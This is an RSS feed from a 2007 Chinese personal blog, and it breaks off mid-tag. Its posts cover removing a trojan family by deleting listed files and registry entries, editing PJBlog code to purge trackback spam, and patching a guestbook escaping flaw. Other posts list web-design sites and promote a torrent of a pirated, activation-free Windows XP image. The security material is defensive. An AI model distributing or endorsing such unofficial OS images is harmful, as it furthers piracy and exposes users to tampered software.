<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[曾经感动Blog]]></title>
<link>http://www.9427188.com/</link>
<description><![CDATA[或许这一切都只是徒劳，但我必须证明我从未放弃！]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog2 v2.4]]></copyright>
<webMaster><![CDATA[ui47@163.com(曾经感动)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>曾经感动Blog</title> 
	<url>http://www.9427188.com/images/logos.gif</url> 
	<link>http://www.9427188.com/</link> 
	<description>曾经感动Blog</description> 
</image>

			<item>
			<link>http://www.9427188.com/default.asp?id=279</link>
			<title><![CDATA[auto.exe,zinforms.dll,rivkae.exe,Kvsc3.exe,MsIMMs3]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[病毒清理]]></category>
			<pubDate>Wed,17 Oct 2007 08:43:08 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=279</guid>	
		<description><![CDATA[写在前面:时间过了这么久,cmdbcs.exe这个死木马群还在活跃,真是奇怪了.(cmdbcs.exe,Kvsc3.exe等如下的红色字体部分) 运行后释放到 system32下一个同名的DLL文件,注入到多个系统进程中.很没新意的老东西,我都懒得说了。LYLoader.exe这个木马群的分析，本博中有多个不再赘述。<br/><br/>解决方法：<br/><br/>进行如下操作前，请不要进行任何双击打开磁盘的操作。所有下载的工具都直接放桌面上。<br/><br/>思路<br/>1、安全模式下操作<br/>强制删除文件 可借助xdelbox, powerRMV等。<br/>C:\Autorun.inf<br/>C:\auto.exe<br/>d:\Autorun.inf<br/>d:\auto.exe<br/>e:\Autorun.inf<br/>e:\auto.exe<br/>f:\Autorun.inf<br/>f:\auto.exe<br/>C:\WINDOWS\system32\4869E900.EXE<br/>C:\WINDOWS\system32\zinforms.dll<br/>C:\WINDOWS\DOWNLO~1\CnsMin.dll<br/>C:\WINDOWS\rivkae.exe<br/>C:\WINDOWS\Kvsc3.exe<br/>C:\WINDOWS\MsIMMs32.exe<br/>C:\WINDOWS\cmdbcs.exe<br/>C:\WINDOWS\msccrt.exe<br/>C:\WINDOWS\MsPrint32D.exe<br/>C:\WINDOWS\upxdnd.exe<br/>C:\WINDOWS\DbgHlp32.exe<br/>C:\WINDOWS\system32\DbgHlp32.dll<br/>C:\WINDOWS\system32\msccrt.dll<br/>C:\WINDOWS\system32\upxdnd.dll<br/>C:\WINDOWS\system32\MsPrint32D.dll<br/>C:\WINDOWS\system32\NVDispDrv.dll<br/>C:\WINDOWS\system32\MsIMMs32.dll<br/>C:\WINDOWS\system32\mppds.dll<br/>C:\WINDOWS\system32\Kvsc3.dll<br/>C:\WINDOWS\system32\GenProtect.dll<br/>C:\Windows\System32\LYLoader.exe<br/>C:\Windows\System32\LYLoadbr.exe<br/>C:\Windows\System32\LYLeador.exe<br/>C:\Windows\System32\LYLoador.exe<br/>C:\Windows\System32\LYLoadar.exe<br/>C:\Windows\System32\LYLoadmr.exe<br/>C:\Windows\System32\LYLoadhr.exe<br/>C:\Windows\System32\LYLoadqr.exe<br/><br/>2.SREng进行如下的操作<br/><br/>启动项目<br/>注册表<br/>[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows] 此项不是删除，是编辑。点击编辑，数值修改为空（即删除其内容，即可）<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;AppInit_DLLs&gt;&lt;zinforms.dll&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[] 修改为 &lt;AppInit_DLLs&gt;&lt;&gt;&nbsp;&nbsp;<br/><br/>启动项目--&gt;注册表的如下各项删除:<br/>[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;CnsMin&gt;&lt;Rundll32.exe C:\WINDOWS\DOWNLO~1\CnsMin.dll,Rundll32&gt; [(Verified)&#34;INTER CHINA NETWORK SOFTWARE (BEIJING) CO., LTD.&#34;]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;GenProtect&gt;&lt;C:\WINDOWS\rivkae.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Kvsc3&gt;&lt;C:\WINDOWS\Kvsc3.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MsIMMs32&gt;&lt;C:\WINDOWS\MsIMMs32.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;cmdbcs&gt;&lt;C:\WINDOWS\cmdbcs.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;msccrt&gt;&lt;C:\WINDOWS\msccrt.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MsPrint32D&gt;&lt;C:\WINDOWS\MsPrint32D.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;upxdnd&gt;&lt;C:\WINDOWS\upxdnd.exe&gt; []<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;DbgHlp32&gt;&lt;C:\WINDOWS\DbgHlp32.exe&gt; []<br/>[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDWG32&gt;&lt;LYLoadbr.exe&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDCG32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &gt;&lt;LYLeador.exe&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDOG32&gt;&lt;LYLoador.exe&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDSG32&gt;&lt;LYLoadar.exe&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDMG32&gt;&lt;LYLoadmr.exe&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDHG32&gt;&lt;LYLoadhr.exe&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MSDQG32&gt;&lt;LYLoadqr.exe&gt; [N/A]<br/><br/>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;{AEB6717E-7E19-11d0-97EE-00C04FD91975}&gt;&lt;zinforms.dll&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;{AEB6717E-7E19-11d0-97EE-00C04FD91974}&gt;&lt;winforms.dll&gt; [N/A]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;{AC2DC2EF-5165-40A3-8CDF-41DCA1B0901A}&gt;&lt;C:\WINDOWS\system32\shlhook.dll&gt; [Beijing Rising Technology Co., Ltd.]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;{32CD708B-60A7-4C00-9377-D73EAA495F0F}&gt;&lt;C:\WINDOWS\system32\RavExt.dll&gt; [Beijing Rising Technology Co., Ltd.]<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;{D157330A-9EF3-49F8-9A67-4141AC41ADD4}&gt;&lt;C:\WINDOWS\DOWNLO~1\CnsHook.dll&gt; [(Verified)&#34;INTER CHINA NETWORK SOFTWARE (BEIJING) CO., LTD.&#34;]<br/><br/>==================================<br/>启动项目--&gt;服务---Win32服务中的如下项目删除:<br/>[4DA52100 / 4DA52100][Stopped/Auto Start]<br/>&lt;C:\WINDOWS\system32\4869E900.EXE -k&gt;&lt;Microsoft Corporation&gt;<br/><br/>最后用windows清理助手或者金山清理专家等工具清理 。<br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=278</link>
			<title><![CDATA[!PJBLOG一次性删除所有引用通告的办法]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[黑客攻防]]></category>
			<pubDate>Tue,16 Oct 2007 11:17:53 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=278</guid>	
		<description><![CDATA[忍无可忍 无需再忍！<br/>PJblog的trackback漏洞被一些网络营销的人利用，发布大量垃圾引用通告，使得我blog里面充满了垃圾引用，而PJblog后台只提供了一次性删除20条引用通告的功能，而我的垃圾引用通告有将近9000条，这说明我要反复操作400多次才能清理完这些垃圾……….<br/>还是自己动手改代码吧，让你一次性删除所有的引用通告，当然，前提时你的引用通告太多而又基本上都是垃圾…..<br/>大家打开根目录下的ConContent.asp 找到2183行的 <br/><br/>程序代码<br/>conn.execute(&#34;Del&#101;te * from blog_Trackback wh&#101;re tb_ID=&#34;&amp;t1)<br/>把它改成 <br/><br/>程序代码<br/>conn.execute(&#34;Del&#101;te * from blog_Trackback&#34;)<br/>保存以后就ok了，原理很简单，原来的数据库删除语句需要传回来一个参数来指定要删除的内容，现在我把参数去掉了，所以每次选中要删除的引用通告并点击删除时就会删除所有的通告！<br/>海量的垃圾信息被删除以后大家就可以把上面的语句恢复回来，以防以后每次都删除所有的引用时误删了有用的信息，当然如果你的引用里面垃圾信息不那么多，你只好一条一条去删除了：） <br/><br/>而我BLOG里 引用通告有接近2W多条.. 这下清净了&nbsp;&nbsp;数据库 减小到原来的5.4倍左右&nbsp;&nbsp;呼... ]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=277</link>
			<title><![CDATA[PJBLOG  完全删除引用功能]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[黑客攻防]]></category>
			<pubDate>Tue,16 Oct 2007 11:11:18 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=277</guid>	
		<description><![CDATA[针对一些人所遇到的垃圾引用完全绕过了所有垃圾验证，怀疑直接被写入数据库。暂时还未找到解决办法，只能放出一个一了百了：关键就是删除数据库字段，让所有东西想写都没得写。但是代价就是失去此功能了。<br/><br/>1、修改数据库<br/><br/>安装OFFICE里的ACCESS软件；<br/><br/>打开blogDB文件夹，把里面的数据库文件（默认为PBLog2.asp）的asp后缀改为mdb后缀；<br/><br/>双击用ACCESS打开，删除整个 blog_Trackback 表：找到，右击，删除；<br/><br/>若是装了防垃圾引用或是元旦版可以顺道删除 blog_Info 表下的 blog_tbKey 字段；<br/><br/>删除后关闭ACCESS，把数据库文件名改回为asp。<br/><br/>2、修改class文件夹下的cls_article.asp<br/><br/>用DW或EP等编辑软件打开cls_article.asp，约150行（2.6）或180行（元旦版），也就是在“显示日志评论内容”一块找到如下代码：<br/><br/>SQL=&#34;Sel&#101;ct comm_ID,comm_Content,comm_Author,comm_PostTime,comm_DisSM,comm_DisUBB,comm_DisIMG,comm_AutoURL,comm_PostIP,comm_AutoKEY,comm_hasReply FROM blog_Comment Wh&#101;re blog_ID=&#34;&amp;LogID&amp;&#34; and comm_parentID=0 UNION ALL Sel&#101;ct 0,tb_Intro,tb_Title,tb_PostTime,tb_URL,tb_Site,tb_ID,0,&#39;127.0.0.1&#39;,0,0 FROM blog_trackback Wh&#101;re blog_ID=&#34;&amp;LogID&amp;&#34; o&#114;DER BY comm_PostTime &#34;&amp;comDesc<br/><br/>整个换成：<br/><br/>SQL=&#34;Sel&#101;ct comm_ID,comm_Content,comm_Author,comm_PostTime,comm_DisSM,comm_DisUBB,comm_DisIMG,comm_AutoURL,comm_PostIP,comm_AutoKEY FROM blog_Comment Wh&#101;re blog_ID=&#34;&amp;LogID&amp;&#34; o&#114;DER BY comm_PostTime &#34;&amp;comDesc<br/><br/>保存<br/><br/>3、删除trackback.asp<br/><br/>4、删除相关显示<br/><br/>包括class文件夹、Template文件夹、search.asp、ConContent.asp等；还有在后台-设置模块-编辑html，修改Search和BlogInfo两模块，删除相关显示。<br/><br/>这些东西，删或者不删除都不会影响使用，只是表面显示。具体删除方法就不多说了。 <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=276</link>
			<title><![CDATA[PJBLOG2 V2.7 build 04 留言本漏洞 修正方法]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[黑客攻防]]></category>
			<pubDate>Tue,16 Oct 2007 08:35:48 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=276</guid>	
		<description><![CDATA[修改两个含有漏洞的asp文件：<br/>Blog目录/Plugins/GuestBook/guestbook.asp<br/>Blog目录/class/cls_article.asp<br/><br/>查找guestbook.asp中的<br/>&lt;%=UBBCode(HtmlEncode(GuestDB(”book_Content”)),0,GBSet.getKeyValue(”ubbCode”),GBSet.getKeyValue(”ImgCode”),GBSet.getKeyValue(”autoURL”),1)%&gt; <br/>改成<br/>&lt;%=CheckStr(UBBCode(HtmlEncode(GuestDB(”book_Content”)),0,GBSet.getKeyValue(”ubbCode”),GBSet.getKeyValue(”ImgCode”),GBSet.getKeyValue(”autoURL”),1))%&gt;<br/><br/>查找cls_article.asp中的<br/>&lt;%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%&gt;<br/>改成<br/>&lt;%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%&gt; <br/><br/>这样修改好两个文件后，就应该不会有此漏洞问题了<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=275</link>
			<title><![CDATA[WINXPSP2电脑城装机10.1标准版 ]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[资源下载]]></category>
			<pubDate>Sun,14 Oct 2007 11:28:24 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=275</guid>	
		<description><![CDATA[==============================================================================<br/>MD5:bc107bf93fdd9ee39531a90f2f75891d<br/>================================================<br/>猪猪猫.CN-WINXPSP2电脑城装机10.1标准版 2007.9&nbsp;&nbsp;<br/>================================================<br/>特点：稳定安全、兼容性好<br/><br/><img src="http://www.9427188.com/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.9427188.com/attachments/month_0710/c20071014112734.torrent" target="_blank">点击下载电脑城装机10.1标准版</a><br/><br/><br/><br/>一、系统介绍<br/><br/> 采用WindowsXPSP2简体中文专业免激活版为蓝本,目前支持在线升级。<br/> 使用离线升级包升级至2007.09.30的所有补丁。<br/> 默认系统磁盘格式为FAT32格式，第一次进系统时会提示是否转换成NTFS格式。<br/><br/><br/>二、系统特色<br/><br/>+系统 完整无缺。<br/>+采用 JUJUMAOGHOST2007克隆终结者（含驱动安装管理器，默认20秒可选择是否安装全部或某部分驱动）。<br/>+采用 微软集成驱动的方式预装主板和IDE/RAID/SATA/SCIS驱动，让系统在各类机器上恢复的成功率接近100%。<br/>+增加 支持原生SATA光驱启动恢复。<br/>+增加 WINPE精简版（可在SATA光驱自动恢复失败的情况下，恢复系统）。<br/>+采用 智能判断CPU类型的方式，为AMD双核用户自动安装优化程序和相应的系统补丁。<br/>+升级 Windows Media Player版本到10，解决网友无法在线观看网络电视和电影的问题。<br/>+保持 以前版本的游戏性!全面杀毒测试,不含任何病毒和木马。<br/>+采用 JUJUMAODiskGhost2.0（猪猫硬盘克隆备份管理器－－硬盘安装器） <br/>+更新 多款精美主题<br/>+添加 精美壁纸近100张（新增变形金刚壁纸）<br/>+保留 系统自带经典、默认两主题<br/>+保留 完整系统鼠标指针<br/>+默认 超酷的VISTA开关机声音 <br/>+修改 TCP/IP连接数为2048<br/>+优化 系统运行速度<br/><br/><br/>三、集成驱动（容量为201M）：<br/><br/>+[主板]：<br/> Intel芯片组 v8.1.1.1003<br/> nForce2芯片组(含IDE、SMBus、GART、memctl) v5.1 WHQL<br/> nForce4芯片组(含IDE、SMBus) v6.66 WHQL<br/> nVidia C51G芯片组(含IDE、SMBus) v18.22 WHQL<br/> nForce5芯片组(含IDE、SMBus) v9.16 WHQL<br/> nVIDIA MCP61芯片组(含IDE、SMBus) v11.08WHQL<br/> nVIDIA MCP68芯片组 <br/> VIA 芯片组HyperionPro v5.06A<br/> ULi 芯片组(含IDE、SMBus)V2.20<br/> ATI 芯片组南桥驱动v6.9<br/>+[显卡]：<br/> NVIDIA GeForce系列显卡 WHQL（含G8系列驱动）<br/> ATI Radeon系列显卡 v7.5<br/> Intel 845G集成显卡 v14.10<br/> Intel 865G、910G、915G、945G集成显卡 v14.17<br/> Intel 945G、965G、G31、G33集成显卡 v14.29<br/> SiS系列集成显卡(SiS315/650/651/740/760)<br/> VIA K8M800/P4M800集成显卡<br/> ATI690<br/>+[声卡]：<br/> Realtek 系列(ALC101/201/650/655/658/850) v3.96<br/> Realtek HD Audio(ALC880/ALC882/ALC883/ALC885/ALC888/ALC260/ALC262/ALC861)音频芯片驱动包 v1.54<br/> SoundMAX_AD188X<br/> SoundMAX_HD AD198X<br/> C-Media CMI8738<br/> C-Media CMI9738/9739A/9761<br/> C-Media CMI9880<br/> SiS 7012<br/> SigmaTel_STAC9750<br/> ALi 板载声卡<br/> VIA 全系列板载声卡<br/>+[网卡]：<br/> Realtek 系列网卡(RTL 8139/8169/8100/8111/8168)<br/> Realtek RTL 8185L/8187L无线网卡<br/> Broadcom 系列千兆网卡<br/> Marvell Yukon系列千兆网卡 v8.49<br/> 3COM 3C940/3C2000<br/> nVida系列集成网卡(nForce2、nForce4、C51G、nForce5、nVIDIA MCP61)<br/> Intel 系列百兆/千兆网卡 v10.3<br/> SIS 900<br/> ULI 系列集成网卡<br/> VIA VT6103/VT6105/VT6122<br/>+[摄像头]<br/> VIMICRO USB PC Camera (ZC0301PLH)<br/><br/><br/>四、安装说明<br/><br/>+光盘安装(推荐)<br/>+请用刻录软件nero，选择&#34;映像刻录&#34;方式来刻录ISO文件。<br/>+刻录之前请先校验一下文件的准确性，刻录速度推荐16X！<br/>+安装请设置光盘启动，然后选择第1个就可以自动安装！<br/>+装多硬盘的机器请务必把除了要安装系统的硬盘保留，其他的暂时拔掉数据线和电源，防止克隆<br/> 错误分区，导致硬盘数据丢失！<br/>+推荐使用质量较好的刻录光盘，否则可能导致系统安装出错。<br/>+硬盘安装器安装<br/> 请提取ISO中JUJUMAODiskGhost.exe(硬盘安装器）、JUJUMAO.GHO、GHOST.exe到硬盘根目录，比如E:\<br/> 运行JUJUDiskGhost，找到JUJUMAO.GHO即可恢复。<br/><br/>五、软件介绍<br/><br/>+预装 Directx 9.0C 2007.08<br/>+预装 OFFICE2003 SP3 精简版（WORD、EXECL、POWERPOINT三组件、公式编辑器及VBA支持）<br/>+预装 WINRAR3.7 美化版&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>+预装 矮人DOS工具箱5.3<br/>+预装 QQ2007 7.0 正式版<br/>+预装 QQ游戏大厅<br/>+预装 五笔86<br/>+预装 搜狗拼音输入法3.0　<br/>+预装 酷我音乐<br/>+预装 暴风影音2007<br/>+预装 实用工具38项，绿色环保，安全无毒。<br/><br/>六、测试机器<br/><br/>+AMD系列<br/><br/>NVIDIA NF2，Athlon XP 1.8G，迈拓160G IDE硬盘，512M DDR<br/>NVIDIA NF4，Athlon64 3000+，西捷160GSATA硬盘，1G DDR<br/>NVIDIA 520，Athlon 64 X2 3600+，160G 西部数据 SATA 硬盘，1G DDRII<br/>NVIDIA C61，Athlon 64 X2 3600+，160G 西部数据 SATA 硬盘，512M DDRII<br/>NVIDIA C68，Athlon 64 X2 3800+，160G 西部数据 SATA 硬盘，1G DDRII<br/>ATI 690G，Athlon 64 X2 4000+，320G SATA 硬盘+200G SAMSUNG IDE 硬盘，2G DDRII<br/><br/><br/>+INTEL系列<br/><br/>VIA 694， CII 800，40 西捷 IDE 硬盘，512M SDRAM<br/>Intel 815EP，P3 733，80G SAMSUNG IDE 硬盘，512M SDRAM<br/>Intel 845G，P4 1.6G，Si3112r SATARaid 阵列卡，200G SAMSUNG IDE 硬盘，1G DDR<br/>Intel 915G，赛扬D 346，80G 西部数据 SATA 硬盘，512M DDR<br/>Intel 875，P4 3.0G，250G 西部数据 SATA 硬盘，1G DDR<br/>Intel G965，Core 2 6300，250G 西部数据 SATAII 硬盘，2G DDRII<br/><img src="http://bbs.jujumao.cn/UploadFile/2007-10/200710415425635809.jpg" border="0" alt=""/><br/><br/><img src="http://www.9427188.com/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.9427188.com/attachments/month_0710/520071014135729.torrent" target="_blank">点击下载此文件</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=274</link>
			<title><![CDATA[网页设计者值得一去的地方]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[网络技术]]></category>
			<pubDate>Sat,13 Oct 2007 14:49:10 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=274</guid>	
		<description><![CDATA[现在网页设计方面的站点越来越多，究竟哪个才是经典；根据网页设计中牵涉到的：网页制作，平面设计，动画制作，素材安排等，我特地找了些好的站点，发表在这里，如果大家有好的站点，也希望能跟在后面。<br/><br/>一、网页设计类<br/><br/>1、 网站名称：有风的日子<br/>　　网站地址：<a href="http://www.windstudio.net/" target="_blank">http://www.windstudio.net/</a> <br/>　　简介：<br/>　　很不错的一个设计网站，我刚开始学习网页设计的时候就知道她了，她最有特色的内容就算是精品插件栏目了，里面包括有Photoshop 滤镜、Dreamweaver 插件、Flash 相关，都是很实用的好东东。同时网站的符号字体栏目也挺有自己的特色。<br/><br/>2、 网站名称：蓝色理想<br/>　　网站地址：<a href="http://www.blueidea.com/" target="_blank">http://www.blueidea.com/</a> <br/>　　简介：<br/>　　网页编辑方面的大哥大人物，网站关于网页制作方面的教程既全面又专业，而且各类教程的更新速度很快。她的经典论坛的人气也是相当的旺。同时该网站的一个很大的特点就是会时不时推出一些好书的介绍，这些都是不容易买到的。<br/><br/>3、 网站名称：七色鸟设计<br/>　　网站地址：<a href="http://www.colorbird.com/" target="_blank">http://www.colorbird.com/</a> <br/>　　简介：<br/>　　七色鸟设计是一个致力于传播设计文化，研究视觉设计艺术、提高大众审美意识的非盈利性的艺术指导网站，里面的设计资源相当丰富而且有特色<br/><br/>4、 网站名称：视觉中国<br/>　　网站地址：<a href="http://www.chinavisual.com/" target="_blank">http://www.chinavisual.com/</a> <br/>　　简介：<br/>　　这个是我最爱的一个网站了，我第一次把网页制作和网页设计区分开来，就是通过看了这个网站上的很多文章得出来的，里面的很多知识以平面为主，以前她的服务器不怎么好，经常出现服务器负载过重的情况,但是现在已经好了。<br/><br/>5、 网站名称：5D多媒体　<br/>　　网站地址：<a href="http://www.5dmedia.com/" target="_blank">http://www.5dmedia.com/</a> <br/>　　简介：<br/>　　5D的含义是指其探讨五个方面的内容：声音、图象、动画、多媒体交互、Internet网开发。该网站是目前国内最大的多媒体技术站点，要想了解多媒体方面的信息还真的是要进去看看。<br/><br/>6、 网站名称：设计联盟<br/>　　网站地址：<a href="http://www.szdesign.org/" target="_blank">http://www.szdesign.org/</a> <br/>　　简介：<br/>　　我非常喜欢她的作品栏目，可以看到很多人的创作，欣赏别人的创作的同时，自己也可以得到很多的启示<br/><br/>7、 网站名称：点燃灵感<br/>　　网站地址：<a href="http://www.fwcn.com/" target="_blank">http://www.fwcn.com/</a> <br/>　　简介：　　<br/>　　这里是Firework的天堂，教程，插件，资源，应有尽有<br/><br/>二、图象处理类<br/>　<br/>1、 网站名称：中国PHOTOSHOP联盟<br/>　　网站地址：<a href="http://www.photoshopcn.com/" target="_blank">http://www.photoshopcn.com/</a> <br/>　　简介：<br/>　　网页设计中的平面处理软件，PS是绝对的老大，中国PHOTOSHOP联盟就是PS教学方面的老大<br/><br/>2、 网站名称：图象谷<br/>　　网站地址：<a href="http://pstxg.com/" target="_blank">http://pstxg.com/</a> <br/>　　简介：<br/>　　搞图象处理的好去处，她的资源下载栏目很出色<br/><br/>三、动画设计类<br/><br/>1、 网站名称：闪客帝国　<br/>　　网站地址：<a href="http://www.flashempire.com/" target="_blank">http://www.flashempire.com/</a> <br/>　　简介：<br/>　　我很早以前做的第一个个人网站就是仿照该网站做的，呵呵，我记得那个时候的帝国还不是现在这个样子。里面关于Flash的教程都很经典。而且论坛里面是高手如云。<br/><br/>2、 网站名称：闪吧<br/>　　网站地址：<a href="http://www.flash8.net/" target="_blank">http://www.flash8.net/</a> <br/>　　简介：　　<br/>　　我第一次知道这个网站是通过电脑爱好者介绍的，具体哪期忘记了，我记得有整整一个版面来介绍这个网站的故事，所以就跑来了，一看就喜欢上了，觉得里面的资料真是太丰富了，和帝国难分高下。<br/><br/>3、 网站名称：数码动力国际<br/>　　网站地址：<a href="http://www.showgood.com/" target="_blank">http://www.showgood.com/</a> <br/>　　简介：<br/>　　该网站已经不需要我们再说，她推出的Flash实在是太棒了！<br/><br/>4、 网站名称：闪盟在线<br/>　　网站地址：<a href="http://www.flashsun.com/" target="_blank">http://www.flashsun.com/</a> <br/>　　简介：<br/>　　网站的优秀以不需多说，我很喜欢她的竞技场栏目<br/><br/>四、网页素材类<br/><br/>1、 网站名称：桌面城市<br/>　　网站地址：<a href="http://www.deskcity.com/" target="_blank">http://www.deskcity.com/</a> <br/>　　简介：<br/>　　一流的图象资料宝库<br/><br/>2、 网站名称：素材精品屋　<br/>　　网站地址：<a href="http://www.sucaiw.com/" target="_blank">http://www.sucaiw.com/</a> <br/>　　简介：<br/>　　也是网页设计素材库，她和桌面城市主要在于一个偏全，一个偏精！<br/><br/>五、网页代码类<br/><br/>1、 网站名称：代码中国<br/>　　网站地址：<a href="http://www.codechina.net" target="_blank">http://www.codechina.net</a> <br/>　　简介：<br/>　　一个专业、全面的源代码下载网站。简洁实用的页面，专业详尽的分类，丰富全面的代码资源，合理的得体的技术运用，处处透露出专业性。无论哪一方面的代码，在这里几乎都找得到，而且在代码社区中，你可以发布一些求助信息，讨论一些技术话题，让你充分体会到网络的互动性。<br/><br/>2、 网站名称：天新网源码下载<br/>　　网站地址：<a href="http://www.21tx.com/src" target="_blank">http://www.21tx.com/src</a> <br/>　　简介：<br/>　　天新网是一个较早的个人网站，也是提供源码下载较早的一个网站。分类较为详尽：首先按语言（或技术）分成大类，每一大类再按代码的用途分为小类，这样，使用起来方便快捷。<br/><br/>3、 网站名称：波士源码下载<br/>　　网站地址：<a href="http://www.boss8u8.com/scdown" target="_blank">http://www.boss8u8.com/scdown</a> <br/>　　简介：<br/>　　主要提供WEB后台程序代码下载。尽管包含的类别有限，代码的丰富程度比不上前两个网站，但是它分类很详细，几乎包含了目前网站上常见的所有程序代码，如果你正在寻找一些WEB后台程序代码，这应该是个好去处。<br/><br/>六、WEB技术类<br/><br/>1、 网站名称：goEway.com<br/>　　网站地址：<a href="http://www.goeway.com" target="_blank">http://www.goeway.com</a> <br/>　　简介：<br/>　　“从不懂得上网，到网络高手”，这是goEway.com的口号。当然，口号就是口号，重要的是，从这个站合理的栏目设置、人性化的设计、丰富的内容、大量实用的文章来看，他们在切切实实地这样做着。<br/><br/>2、 网站名称：HTML.CN<br/>　　网站地址：<a href="http://www.htmlcn.com" target="_blank">http://www.htmlcn.com</a> <br/>　　简介：<br/>　　不用我多说，从站点和网址你就知道这是一个什么类型的网站了。不过，这里可不仅仅有HTML。还有网页制作软件。CSS、JavaScript以及ASP、PHP等等，可以说从网页制作到web编程都涉及到了。尽管它的内容还不能说十分丰富，但都很实用。<br/><br/>3、 网站名称：流媒体中国技术频道<br/>　　网站地址：<a href="http://www.liumeiti.com/technology" target="_blank">http://www.liumeiti.com/technology</a> <br/>　　简介：<br/>　　流媒体指在Internet/Intranet中使用流式传输技术的连续时基媒体（如relsystem.MPEG等）。顾名思义，流媒体中国就是一个以“流媒体”为主题的网站，在它的技术频道中，有大量的相关文章。对于从事或有心从事这方面技术的网友来说，绝对是一个不可多得的好去处。另外，有什么疑问和心得，你还可以去“流氏论坛”去讨论。<br/><br/>4、 网站名称：虚拟无忌<br/>　　网站地址：<a href="http://www.86vr.com" target="_blank">http://www.86vr.com</a> <br/>　　简介：<br/>　　虚拟现实（简称VR）技术虽然出现已经有几年，但一直没有普及起来。随着宽带的普及以及它自身特有的魅力，将来一定会有发展。虚拟现实的方方面面在这都可以找到。<br/><br/>七、加盟网站类<br/><br/>做网页的人都希望把自己的网站推销出去，推销的方法有很多，通过加盟品网网站就是个不错的方法，在那里你推销自己的网站，通过品网的评价后，发布出来，这样可以让更多的人知道你的网站。下面这些就是我找的几个在国内比较有名的品网网站,网站的评价我就没写了，因为性质都差不多。<br/><br/>1&gt;　网站名称：零刻联盟<br/>　　网站地址：<a href="http://www.linkmeng.com" target="_blank">http://www.linkmeng.com</a> <br/>2&gt;　网站名称：贵族品网<br/>　　网站地址：<a href="http://www.21pick.com/index.asp" target="_blank">http://www.21pick.com/index.asp</a> <br/>3&gt;　网站名称：汕头网页设计师联盟<br/>　　网站地址：<a href="http://www.0754design.com" target="_blank">http://www.0754design.com</a> <br/>4&gt;　网站名称：浪掏沙<br/>　　网站地址：<a href="http://www.langtaosha.net/pick/index.asp" 